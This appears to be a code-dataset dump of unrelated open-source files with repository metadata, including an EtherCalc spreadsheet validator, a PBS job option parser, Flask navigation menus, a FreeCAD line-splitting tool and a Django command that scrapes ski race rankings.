except subprocess.CalledProcessError:
print("exception analysing the repository - skipping")
shutil.rmtree(temp_repo_dir)
return False
except subprocess.TimeoutExpired:
print("timeout analysing the repository - skipping")
shutil.rmtree(temp_repo_dir)
return False
return True
def prepare_metrics_data(candidate_repo, output_file, repo_id, repo_name):
# analyse code quality vs stars and num contributors
print("preparing data")
metrics_raw = pandas.read_csv(output_file)
metrics_raw.pop("file")
metrics_raw.pop("class")
metrics_raw.pop("type")
# for each metric compute mean, median, Q1, and Q3
mean = metrics_raw.mean().rename(lambda x: "average_{}".format(x))
median = metrics_raw.median().rename(lambda x: "median_{}".format(x))
q1 = metrics_raw.quantile(q=0.25).rename(lambda x: "Q1_{}".format(x))
q3 = metrics_raw.quantile(q=0.75).rename(lambda x: "Q3_{}".format(x))
temp_frame = pandas.DataFrame(pandas.concat([mean, median, q1, q3])).T
temp_frame['id'] = repo_id
temp_frame['name'] = repo_name
temp_frame['stars'] = candidate_repo["stargazers_count"]
temp_frame['contributors_total'] = candidate_repo["num_contributors"]
return temp_frame
if __name__ == '__main__':
main()
| mit | -8,530,514,884,157,262,000 | 31.634921 | 110 | 0.621109 | false | 3.648625 | false | false | false |
cligu/gitdox | modules/validation/ether_validator.py | 1 | 13538 | from validator import Validator
from collections import defaultdict
import re
class EtherValidator(Validator):
def __init__(self, rule):
self.corpus = rule[0]
self.doc = rule[1]
self.domain = rule[2]
self.name = rule[3]
self.operator = rule[4]
self.argument = rule[5]
def _apply_exists(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
if len(col_letters) == 0:
report += "Column named '" + self.name + "' not found<br/>"
return report, tooltip, cells
def _apply_doesntexist(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
if len(col_letters) > 0:
report += "Columns named '" + self.name + "' are not allowed<br/>"
cells += [letter + "1" for letter in col_letters]
return report, tooltip, cells
def _apply_span_equals_number(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
if len(col_letters) == 0:
report += "Column named " + self.name + " not found<br/>"
return report, tooltip, cells
for letter in col_letters:
for cell in parsed_ether[letter]:
if cell.row == "1":
continue
if self.argument == "1":
if cell.span != "1":
report += "Cell " + cell.col + cell.row + ": span is not 1<br/>"
cells.append(cell.col + cell.row)
else:
if cell.span != "" and cell.span != self.argument:
report += "Cell " + cell.col + cell.row + ": span is not " + self.argument + "<br/>"
cells.append(cell.col + cell.row)
return report, tooltip, cells
def _apply_regex(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
for letter in col_letters:
for cell in parsed_ether[letter]:
if cell.row == "1":
continue
match = re.search(self.argument, cell.content)
if match is None:
report += ("Cell " + cell.col + cell.row
+ ": content does not match pattern " + self.argument + "<br/>")
tooltip += ("Cell " + cell.col + cell.row + ":<br/>"
+ "Content: " + cell.content + "<br/>"
+ "Pattern: " + self.argument + "<br/>")
cells.append(cell.col + cell.row)
return report, tooltip, cells
def _binary_op_check_cols_exist(self, colmap):
name_letters = colmap[self.name]
arg_letters = colmap[self.argument]
if len(name_letters) == 0:
if self.operator != "==":
return "Column named " + self.name + " not found<br/>"
if len(arg_letters) == 0:
if self.operator != "==":
return "Column named " + self.argument + " not found<br/>"
return ""
def _binary_op_setup(self, parsed_ether):
colmap = parsed_ether['__colmap__'] # name -> list of col letters
name_letters = colmap[self.name]
arg_letters = colmap[self.argument]
name_tuples = defaultdict(list)
arg_tuples = defaultdict(list)
start_rows = defaultdict(list)
all_rows = []
for letter in name_letters:
for cell in parsed_ether[letter]:
start_rows[letter].append(cell.row)
# "de-merge" cell so we have an entry for every row in its span with its letter and content
for i in range(int(cell.span) or 1):
row = str(int(cell.row) + i)
name_tuples[row].append((letter, cell.content))
all_rows.append(row)
# same as above with arg_letters
for letter in arg_letters:
for cell in parsed_ether[letter]:
start_rows[letter].append(cell.row)
for i in range(int(cell.span) or 1):
row = str(int(cell.row) + i)
arg_tuples[row].append((letter, cell.content))
if row not in all_rows:
all_rows.append(row)
name_start_cells = []
name_start_rows = set() # for O(1) lookup
for letter in name_letters:
name_start_cells += [(letter, row) for row in start_rows[letter]]
name_start_rows = name_start_rows.union(set(row for row in start_rows[letter]))
arg_start_cells = []
arg_start_rows = set()
for letter in arg_letters:
arg_start_cells += [(letter, row) for row in start_rows[letter]]
arg_start_rows = arg_start_rows.union(set(row for row in start_rows[letter]))
return name_letters, arg_letters, name_tuples, arg_tuples, start_rows, all_rows, \
name_start_cells, name_start_rows, arg_start_cells, arg_start_rows
def _apply_subspan(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
err = self._binary_op_check_cols_exist(colmap)
if err:
report += err
return report, tooltip, cells
name_letters, arg_letters, name_tuples, \
arg_tuples, start_rows, all_rows, \
name_start_cells, name_start_rows, \
arg_start_cells, arg_start_rows = self._binary_op_setup(parsed_ether)
for row in all_rows:
# check to see if all cells in rhs are contained within cells on lhs
if row in arg_tuples and row not in name_tuples:
for letter, _ in arg_tuples[row]:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " must appear in the span of a cell in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
return report, tooltip, cells
def _apply_equal_span_length(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
err = self._binary_op_check_cols_exist(colmap)
if err:
report += err
return report, tooltip, cells
name_letters, arg_letters, name_tuples, \
arg_tuples, start_rows, all_rows, \
name_start_cells, name_start_rows, \
arg_start_cells, arg_start_rows = self._binary_op_setup(parsed_ether)
for row in all_rows:
if row == "1":
continue
name_len = len(name_tuples[row])
arg_len = len(arg_tuples[row])
if name_len > arg_len:
for letter, _ in name_tuples[row][arg_len:]:
if row not in name_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " has no corresponding value in one of these columns: "
+ ", ".join(arg_letters) + "<br/>")
elif arg_len > name_len:
for letter, _ in arg_tuples[row][name_len:]:
if row not in arg_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " has no corresponding value in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
for letter, row in name_start_cells:
if row not in arg_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " needs a span of equal length beginning in one of these columns: "
+ ", ".join(arg_letters) + "<br/>")
for letter, row in arg_start_cells:
if row not in name_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " needs a span of equal length beginning in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
return report, tooltip, cells
def _apply_equal_span_length_and_content(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
err = self._binary_op_check_cols_exist(colmap)
if err:
report += err
return report, tooltip, cells
name_letters, arg_letters, name_tuples, \
arg_tuples, start_rows, all_rows, \
name_start_cells, name_start_rows, \
arg_start_cells, arg_start_rows = self._binary_op_setup(parsed_ether)
for row in all_rows:
if row == "1":
continue
name_len = len(name_tuples[row])
arg_len = len(arg_tuples[row])
if name_len > arg_len:
for letter, _ in name_tuples[row][arg_len:]:
if row not in name_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " has no corresponding value in one of these columns: "
+ ", ".join(arg_letters) + "<br/>")
elif arg_len > name_len:
for letter, _ in arg_tuples[row][name_len:]:
if row not in arg_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " has no corresponding value in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
for i in range(min(len(name_tuples[row]), len(arg_tuples[row]))):
name_letter, name_content = name_tuples[row][i]
arg_letter, arg_content = arg_tuples[row][i]
if arg_content != name_content and (row in start_rows[arg_letter] or row in start_rows[name_letter]):
cells.append(name_letter + row)
cells.append(arg_letter + row)
report += ("Cells " + name_letter + row
+ " and " + arg_letter + row
+ " must have equivalent content.<br/>")
for letter, row in name_start_cells:
if row not in arg_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " needs a span of equal length beginning in one of these columns: "
+ ", ".join(arg_letters) + "<br/>")
for letter, row in arg_start_cells:
if row not in name_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " needs a span of equal length beginning in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
return report, tooltip, cells
def _apply_rule(self, parsed_ether):
if self.name is None:
return "", "", []
if self.operator == "exists":
return self._apply_exists(parsed_ether)
if self.operator == "doesntexist":
return self._apply_doesntexist(parsed_ether)
elif self.operator == "|":
return self._apply_span_equals_number(parsed_ether)
elif self.operator == "~":
return self._apply_regex(parsed_ether)
elif self.operator == ">":
return self._apply_subspan(parsed_ether)
elif self.operator == "=":
return self._apply_equal_span_length(parsed_ether)
elif self.operator == "==":
return self._apply_equal_span_length_and_content(parsed_ether)
else:
raise Exception("Unknown EtherCalc validation operator: '" + str(self.operator) + "'")
def applies(self, doc_name, doc_corpus):
if self.corpus is not None and re.search(self.corpus, doc_corpus) is None:
return False
if self.doc is not None and re.search(self.doc, doc_name) is None:
return False
return True
def validate(self, parsed_ether):
report, tooltip, cells = self._apply_rule(parsed_ether)
return {"report": report,
"tooltip": tooltip,
"cells": cells}
| apache-2.0 | 6,834,000,973,809,227,000 | 40.783951 | 117 | 0.503989 | false | 4.205654 | false | false | false |
oj-development/oj-web | oj_core/migrations/0009_auto_20150902_0258.py | 1 | 1147 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('oj_core', '0008_userstatus_solved_problems'),
]
operations = [
migrations.AlterField(
model_name='status',
name='memory',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='status',
name='result',
field=models.PositiveSmallIntegerField(default=10),
),
migrations.AlterField(
model_name='status',
name='score',
field=models.PositiveSmallIntegerField(default=0),
),
migrations.AlterField(
model_name='status',
name='time',
field=models.FloatField(default=0),
),
migrations.AlterField(
model_name='status',
name='user',
field=models.ForeignKey(to='oj_core.UserStatus', null=True, on_delete=django.db.models.deletion.SET_NULL),
),
]
| mit | -4,211,019,953,965,281,000 | 27.675 | 118 | 0.569311 | false | 4.551587 | false | false | false |
arlolra/exitaddr | server.py | 1 | 2010 | #!/usr/bin/env python
import json
from twisted.web import server, resource
from twisted.internet import reactor
from common import Exitaddr, options
DEFAULT_PORT = 8080
exitaddr_results = None
def addHeader(request):
h = request.responseHeaders
h.addRawHeader(b"content-type", b"application/json")
class Res(resource.Resource):
def getChild(self, name, request):
''' handle trailing / '''
if name == '':
return self
return resource.Resource.getChild(self, name, request)
class Exits(Res):
''' json dump of our state '''
def render_GET(self, request):
addHeader(request)
return json.dumps(exitaddr_results, indent=4)
class IP(Res):
''' json response with the remote host ip '''
def render_GET(self, request):
host = request.transport.getPeer().host
header = request.received_headers.get("X-Forwared-For", None)
if header is not None:
host = header.split(',')[-1].strip()
response = {"IP": host}
addHeader(request)
return json.dumps(response, indent=4)
class Ser(Exitaddr):
def __init__(self, *args, **kwargs):
Exitaddr.__init__(self, *args, **kwargs)
self.fld = 0
def passed(self, result):
pass
def failed(self, result):
print result[0].id_hex[1:], "failed"
self.fld += 1
def finished(self, results):
global exitaddr_results
res = {}
for key in results.keys():
res[key] = results[key][1]
exitaddr_results = res
print ""
print "failed", self.fld
print "exit list ready!"
def main():
root = resource.Resource()
root.putChild("exits", Exits())
root.putChild("ip", IP())
reactor.listenTCP(DEFAULT_PORT, server.Site(root))
# sample a few for now
options.num_exits = 25
exitaddr = Ser(reactor, options)
print "listening on", DEFAULT_PORT
exitaddr.start()
if __name__ == "__main__":
main()
| mit | -9,052,537,412,710,313,000 | 22.647059 | 69 | 0.604478 | false | 3.764045 | false | false | false |
macressler/vsc-tools-lib | lib/vsc/pbs/option_parser.py | 1 | 9482 | #!/usr/bin/env python
'''class for parsing PBS options'''
from argparse import ArgumentParser
import os, re, validate_email
from vsc.event_logger import EventLogger
from vsc.utils import walltime2seconds, size2bytes
from vsc.utils import InvalidWalltimeError
class PbsOptionParser(EventLogger):
'''Parser for PBS options, either command line or directives'''
def __init__(self, config, event_defs, job):
'''constructor'''
super(PbsOptionParser, self).__init__(event_defs, 'global')
self._config = config
self._job = job
self._arg_parser = ArgumentParser()
self._arg_parser.add_argument('-A')
self._arg_parser.add_argument('-e')
self._arg_parser.add_argument('-j')
self._arg_parser.add_argument('-k')
self._arg_parser.add_argument('-l', action='append')
self._arg_parser.add_argument('-m')
self._arg_parser.add_argument('-M')
self._arg_parser.add_argument('-N')
self._arg_parser.add_argument('-o')
self._arg_parser.add_argument('-q')
def parse_args(self, option_line):
'''parse options string'''
self._events = []
args = option_line.split()
options, rest = self._arg_parser.parse_known_args(args)
for option, value in options.__dict__.items():
if value:
self.handle_option(option, value)
if self._job.queue and not self._job._is_time_limit_set:
walltime_limit = self.get_queue_limit(self._job.queue)
if walltime_limit:
self._job._resource_specs['walltime'] = walltime_limit
def handle_option(self, option, value):
'''option dispatch method'''
if option == 'A':
self.check_A(value.strip())
elif option == 'e' or option == 'o':
self.check_oe(value.strip(), option)
elif option == 'j':
self.check_j(value.strip())
elif option == 'k':
self.check_k(value.strip())
elif option == 'l':
self.check_l(value)
elif option == 'm':
self.check_m(value.strip())
elif option == 'M':
self.check_M(value.strip())
elif option == 'N':
self.check_N(value.strip())
elif option == 'q':
self.check_q(value.strip())
def check_A(self, val):
'''check whether a valid project name was specified'''
if re.match(r'[A-Za-z]\w*$', val):
self._job.project = val
else:
self.reg_event('invalid_project_name', {'val': val})
def get_queue_limit(self, queue_name):
'''get the maximum walltime for the queue specified'''
for queue_def in self._config['queue_definitions']:
if queue_def['name'] == queue_name:
return int(queue_def['walltime_limit'])
return None
def check_q(self, val):
'''check whether a valid queue name was specified'''
if re.match(r'[A-Za-z]\w*$', val):
self._job.queue = val
else:
self.reg_event('invalid_queue_name', {'val': val})
def check_j(self, val):
'''check -j option, vals can be oe, eo, n'''
if val == 'oe' or val == 'eo' or val == 'n':
self._job.join = val
else:
self.reg_event('invalid_join', {'val': val})
def check_k(self, val):
'''check -k option, val can be e, o, oe, eo, or n'''
if re.match(r'^[eo]+$', val) or val == 'n':
self._job.keep = val
else:
self.reg_event('invalid_keep', {'val': val})
def check_m(self, val):
'''check -m option, val can be any combination of b, e, a, or n'''
if re.match(r'^[bea]+$', val) or val == 'n':
self._job.mail_events = val
else:
self.reg_event('invalid_mail_event', {'val': val})
def check_M(self, val):
'''check -M option'''
self._job.mail_addresses = val.split(',')
uid = os.getlogin()
for address in self._job.mail_addresses:
if (not validate_email.validate_email(address) and
address != uid):
self.reg_event('invalid_mail_address', {'address': address})
def check_N(self, val):
'''check -N is a valid job name'''
if re.match(r'[A-Za-z]\w{,14}$', val):
self._job.name = val
else:
self.reg_event('invalid_job_name', {'val': val})
def check_time_res(self, val, resource_spec):
'''check a time resource'''
attr_name, attr_value = val.split('=')
try:
seconds = walltime2seconds(attr_value)
resource_spec[attr_name] = seconds
except InvalidWalltimeError:
self.reg_event('invalid_{0}_format'.format(attr_name),
{'time': attr_value})
def check_generic_res(self, val, resource_spec):
'''check a generic resource'''
attr_name, attr_value = val.split('=')
if attr_name == 'feature':
resource_spec[attr_name] = attr_value.split(':')
else:
resource_spec[attr_name] = attr_value
def check_mem_res(self, val, resource_spec):
'''check memory resource'''
attr_name, attr_value = val.split('=')
match = re.match(r'(\d+)([kmgt])?[bw]', attr_value)
if match:
amount = int(match.group(1))
order = match.group(2)
resource_spec[attr_name] = size2bytes(amount, order)
else:
self.reg_event('invalid_{0}_format'.format(attr_name),
{'size': attr_value})
def check_nodes_res(self, val, resource_spec):
'''check nodes resource'''
_, attr_value = val.split('=', 1)
# if present, multiple node specifications are separated by '+'
node_spec_strs = attr_value.split('+')
node_specs = []
for node_spec_str in node_spec_strs:
node_spec = {'features': []}
spec_strs = node_spec_str.split(':')
# if a node spec starts with a number, that's the number of nodes,
# otherwise it can be a hostname or a feature, but number of nodes is 1
if spec_strs[0].isdigit():
node_spec['nodes'] = int(spec_strs[0])
else:
node_spec['nodes'] = 1
# note that this might be wrong, it may actually be a feature, but
# that is a semantic check, not syntax
node_spec['host'] = spec_strs[0]
# now deal with the remaining specifications, ppn, gpus and features
for spec_str in spec_strs[1:]:
if (spec_str.startswith('ppn=') or
spec_str.startswith('gpus=')):
key, value = spec_str.split('=')
if value.isdigit():
node_spec[key] = int(value)
else:
self.reg_event('{0}_no_number'.format(key),
{'number': value})
else:
node_spec['features'].append(spec_str)
node_specs.append(node_spec)
resource_spec['nodes'] = node_specs
def check_procs_res(self, val, resource_spec):
'''check procs resource specification'''
attr_name, attr_value = val.split('=')
if attr_name in resource_spec:
self.reg_event('multiple_procs_specs')
if not attr_value.isdigit():
self.reg_event('non_integer_procs', {'procs': attr_value})
resource_spec[attr_name] = int(attr_value)
def check_l(self, vals):
'''check and handle resource options'''
resource_spec = {}
has_default_pmem = True
# there can be multiple -l options on one line or on the command line
for val_str in (x.strip() for x in vals):
# values can be combined by using ','
for val in (x.strip() for x in val_str.split(',')):
if (val.startswith('walltime=') or
val.startswith('cput=') or
val.startswith('pcput=')):
self.check_time_res(val, resource_spec)
self._job._is_time_limit_set = True
elif (val.startswith('mem=') or val.startswith('pmem=') or
val.startswith('vmem=') or val.startswith('pvmem=')):
self.check_mem_res(val, resource_spec)
if val.startswith('pmem='):
has_default_pmem = False
elif val.startswith('nodes='):
self.check_nodes_res(val, resource_spec)
elif val.startswith('procs='):
self.check_procs_res(val, resource_spec)
elif (val.startswith('partition=') or
val.startswith('feature') or
val.startswith('qos')):
self.check_generic_res(val, resource_spec)
else:
self.reg_event('unknown_resource_spec', {'spec': val})
self._job.add_resource_specs(resource_spec)
self._job._has_default_pmem = has_default_pmem
def check_oe(self, val, option):
'''check for valid -o or -e paths'''
if ':' in val:
host, path = val.split(':', 1)
else:
host = None
path = val
if option == 'e':
self._job.set_error(path, host)
else:
self._job.set_output(path, host)
| lgpl-3.0 | 2,629,034,364,437,918,000 | 38.840336 | 76 | 0.531955 | false | 3.902058 | false | false | false |
macalik/TITDev | views/navigation.py | 2 | 7793 | import json
from hashlib import sha1
from flask_nav import Nav
from flask_nav.elements import Navbar, View, Subgroup, Link, Text
from flask_bootstrap.nav import BootstrapRenderer
from flask import session, url_for
from dominate import tags
class LinkTab(Link):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class LogIn(View):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class SeparatorAlign(Text):
def __init__(self):
super().__init__("")
class Navigation:
with open("configs/base.json", "r") as base_config_file:
base_config = json.load(base_config_file)
base = ['TiT', View('Home', 'home'), View('Account', "account.home")]
services = [View('JF Service', "jf.home"), View('Buyback Service', 'buyback.home'),
View('Fittings', "fittings.home"), View("Market Service", "ordering.home")]
settings = [SeparatorAlign(), View("Bug Report", 'issues'), View("Change Theme", "settings"),
View('Log Out', 'auth.log_out')]
alliance = base + services
corp = base + [Subgroup("Corporation", View('Corp Main', "corp.home"),
LinkTab("Corp Forums", base_config["forum_url"])),
Subgroup("Services", *services)]
def __init__(self, app):
nav = Nav()
# noinspection PyUnusedLocal,PyAbstractClass,PyMethodMayBeStatic,PyPep8Naming
@nav.renderer('custom')
class CustomRenderer(BootstrapRenderer):
# External links now open in new tab
def visit_LinkTab(self, node):
item = tags.li()
item.add(tags.a(node.text, href=node.get_url(), target="_blank"))
return item
def visit_LogIn(self, node):
item = tags.li()
inner = item.add(tags.a(href=node.get_url(), _class="nav-image"))
inner.add(tags.img(src=url_for("static", filename="sso_login.png")))
if node.active:
item['class'] = 'active'
return item
def visit_SeparatorAlign(self, node):
return NotImplementedError
def visit_Navbar(self, node):
# create a navbar id that is somewhat fixed, but do not leak any
# information about memory contents to the outside
node_id = self.id or sha1(str(id(node)).encode()).hexdigest()
root = tags.nav() if self.html5 else tags.div(role='navigation')
root['class'] = 'navbar navbar-default'
cont = root.add(tags.div(_class='container-fluid'))
# collapse button
header = cont.add(tags.div(_class='navbar-header'))
btn = header.add(tags.button())
btn['type'] = 'button'
btn['class'] = 'navbar-toggle collapsed'
btn['data-toggle'] = 'collapse'
btn['data-target'] = '#' + node_id
btn['aria-expanded'] = 'false'
btn['aria-controls'] = 'navbar'
btn.add(tags.span('Toggle navigation', _class='sr-only'))
btn.add(tags.span(_class='icon-bar'))
btn.add(tags.span(_class='icon-bar'))
btn.add(tags.span(_class='icon-bar'))
# title may also have a 'get_url()' method, in which case we render
# a brand-link
if node.title is not None:
if hasattr(node.title, 'get_url'):
header.add(tags.a(node.title.text, _class='navbar-brand',
href=node.title.get_url()))
else:
header.add(tags.span(node.title, _class='navbar-brand'))
bar = cont.add(tags.div(
_class='navbar-collapse collapse',
id=node_id,
))
bar_list = bar.add(tags.ul(_class='nav navbar-nav'))
bar_list_right = bar.add(tags.ul(_class='nav navbar-nav navbar-right'))
to_right = False
for item in node.items:
if isinstance(item, SeparatorAlign):
to_right = True
continue
if not to_right:
bar_list.add(self.visit(item))
else:
bar_list_right.add(self.visit(item))
return root
@nav.navigation('anon')
def nav_anon():
return Navbar('TiT', View('Home', 'home'),
View('Buyback Service', 'buyback.home'), View('JF Service', "jf.home"),
View('Recruitment', 'recruitment.home'),
SeparatorAlign(), View("Change Theme", "settings"), LogIn('Log In', 'auth.sso_redirect'))
@nav.navigation('neut')
def nav_neut():
return Navbar('TiT', View('Home', 'home'), View('Account', "account.home"),
View('Buyback Service', 'buyback.home'), View('JF Service', "jf.home"),
View('Recruitment', 'recruitment.home'),
SeparatorAlign(), View("Change Theme", "settings"), View('Log Out', 'auth.log_out'))
@nav.navigation('corporation')
def nav_corp():
items = Navigation.corp + Navigation.settings
return Navbar(*items)
@nav.navigation('alliance')
def nav_alliance():
items = Navigation.alliance + Navigation.settings
return Navbar(*items)
@nav.navigation('admin')
def nav_admin():
admin_elements = []
role_elements = []
market_service = False
security = False
for role in session.get("UI_Roles"):
if role == "jf_admin":
admin_elements += [View('JF Routes', "jf.admin"), View('JF Stats', "jf.stats")]
elif role == "user_admin":
admin_elements.append(View('User Roles', "admin.roles"))
elif role == "jf_pilot":
role_elements.append(View('JF Service', "jf.pilot"))
elif role == "buyback_admin":
admin_elements.append(View('Buyback Service', 'buyback.admin'))
elif role in ["ordering_marketeer", "ordering_admin"] and not market_service:
role_elements.append(View('Market Service', 'ordering.admin'))
market_service = True
elif role in ["security_officer", "recruiter"] and not security:
role_elements.append(View('Recruitment Apps', 'recruitment.applications'))
if role == "security_officer":
role_elements.append(View('Security Info', 'security.home'))
admin_elements.append(View('Recruitment Settings', 'recruitment.admin'))
security = True
elif role == "recruiter" and not security:
role_elements.append(View('Recruitment Apps', 'recruitment.applications'))
subs = []
if role_elements:
subs.append(Subgroup('Role Pages', *role_elements))
if admin_elements:
subs.append(Subgroup('Admin Pages', *admin_elements))
if session["UI_Corporation"]:
items = Navigation.corp + subs + Navigation.settings
elif session["UI_Alliance"]:
items = Navigation.alliance + subs + Navigation.settings
else:
return nav_neut()
return Navbar(*items)
nav.init_app(app)
| mit | -4,933,823,219,203,500,000 | 41.584699 | 115 | 0.519954 | false | 4.207883 | false | false | false |
Fat-Zer/FreeCAD_sf_master | src/Mod/Draft/draftguitools/gui_split.py | 3 | 4997 | # ***************************************************************************
# * (c) 2009, 2010 Yorik van Havre <yorik@uncreated.net> *
# * (c) 2009, 2010 Ken Cline <cline@frii.com> *
# * (c) 2020 Eliud Cabrera Castillo <e.cabrera-castillo@tum.de> *
# * *
# * This file is part of the FreeCAD CAx development system. *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * FreeCAD is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with FreeCAD; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
"""Provides GUI tools to split line and wire objects."""
## @package gui_split
# \ingroup draftguitools
# \brief Provides GUI tools to split line and wire objects.
## \addtogroup draftguitools
# @{
from PySide.QtCore import QT_TRANSLATE_NOOP
import FreeCAD as App
import FreeCADGui as Gui
import Draft_rc
import DraftVecUtils
import draftguitools.gui_base_original as gui_base_original
import draftguitools.gui_tool_utils as gui_tool_utils
from draftutils.messages import _msg
from draftutils.translate import translate
# The module is used to prevent complaints from code checkers (flake8)
True if Draft_rc.__name__ else False
class Split(gui_base_original.Modifier):
"""Gui Command for the Split tool."""
def GetResources(self):
"""Set icon, menu and tooltip."""
return {'Pixmap': 'Draft_Split',
'Accel': "S, P",
'MenuText': QT_TRANSLATE_NOOP("Draft_Split", "Split"),
'ToolTip': QT_TRANSLATE_NOOP("Draft_Split", "Splits the selected line or polyline into two independent lines\nor polylines by clicking anywhere along the original object.\nIt works best when choosing a point on a straight segment and not a corner vertex.")}
def Activated(self):
"""Execute when the command is called."""
super(Split, self).Activated(name=translate("draft","Split"))
if not self.ui:
return
_msg(translate("draft", "Click anywhere on a line to split it."))
self.call = self.view.addEventCallback("SoEvent", self.action)
def action(self, arg):
"""Handle the 3D scene events.
This is installed as an EventCallback in the Inventor view.
Parameters
----------
arg: dict
Dictionary with strings that indicates the type of event received
from the 3D view.
"""
if arg["Type"] == "SoKeyboardEvent":
if arg["Key"] == "ESCAPE":
self.finish()
elif arg["Type"] == "SoLocation2Event":
gui_tool_utils.getPoint(self, arg)
gui_tool_utils.redraw3DView()
elif (arg["Type"] == "SoMouseButtonEvent"
and arg["Button"] == "BUTTON1"
and arg["State"] == "DOWN"):
self.point, ctrlPoint, info = gui_tool_utils.getPoint(self, arg)
if "Edge" in info["Component"]:
return self.proceed(info)
def proceed(self, info):
"""Proceed with execution of the command after click on an edge."""
wire = App.ActiveDocument.getObject(info["Object"])
edge_index = int(info["Component"][4:])
Gui.addModule("Draft")
_cmd = "Draft.split"
_cmd += "("
_cmd += "FreeCAD.ActiveDocument." + wire.Name + ", "
_cmd += DraftVecUtils.toString(self.point) + ", "
_cmd += str(edge_index)
_cmd += ")"
_cmd_list = ["s = " + _cmd,
"FreeCAD.ActiveDocument.recompute()"]
self.commit(translate("draft", "Split line"),
_cmd_list)
self.finish()
Gui.addCommand('Draft_Split', Split())
## @}
| lgpl-2.1 | 2,060,247,133,012,958,500 | 42.833333 | 273 | 0.528117 | false | 4.27094 | false | false | false |
Tooskich/python_core | rankings/management/commands/updateraces.py | 1 | 1785 | #-*- coding: utf-8 -*-
import os
import shutil
from django.core.management.base import BaseCommand, CommandError
# CURRENT_DIR = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
# BACKEND_DIR = os.path.abspath(os.path.join(CURRENT_DIR, os.pardir))
# APP_DIR = os.path.abspath(os.path.join(BACKEND_DIR, os.pardir))
# WEBAPPS_DIR = os.path.abspath(os.path.join(APP_DIR, os.pardir))
# For production:
CURRENT_DIR = '/home/tooski/webapps/python_core/python_core/rankings/'
BACKEND_DIR = '/home/tooski/webapps/python_core/python_core/'
APP_DIR = '/home/tooski/webapps/python_core/'
WEBAPPS_DIR = '/home/tooski/webapps/'
# For dev:
# CURRENT_DIR = '/home/seba-1511/Dropbox/Dev/tooski/python_core/rankings/'
# BACKEND_DIR = '/home/seba-1511/Dropbox/Dev/tooski/python_core/'
# APP_DIR = '/home/seba-1511/Dropbox/Dev/tooski/'
# WEBAPPS_DIR = '/home/seba-1511/Dropbox/Dev/tooski/'
class Command(BaseCommand):
args = 'None'
help = 'Updates the table to the latest races, directly scrapped from the FIS website.'
def handle(self, *args, **options):
os.system('rm ' + WEBAPPS_DIR + 'website/ranking.json')
os.system('rm ' + CURRENT_DIR + 'fis/ranking.json')
# We get the leaderboard rankings and move them to the Apache server:
os.system('cd ' + CURRENT_DIR +
'/fis/ && scrapy crawl ranking -o ranking.json -t json')
# Testing:
shutil.copy(CURRENT_DIR + 'fis/ranking.json',
WEBAPPS_DIR + 'website/ranking.json')
# Server
# shutil.copy(CURRENT_DIR + '/fis/ranking.json',
# WEBAPPS_DIR + '/website/ranking.json')
# We should use the pipeline system of scrapy with the races.
os.system('cd ' + CURRENT_DIR + '/fis/ && scrapy crawl races')
| apache-2.0 | 1,120,057,887,100,004,500 | 40.511628 | 91 | 0.658263 | false | 3.010118 | false | false | false |
smysnk/sikuli-framework | src/robotframework/common/Selenium2Server.py | 2 | 2234 | """
Copyright (c) 2013, SMART Technologies ULC
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the Copyright holder (SMART Technologies ULC) nor
the names of its contributors (Joshua Henn) may be used to endorse or
promote products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER (SMART Technologies
ULC) "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
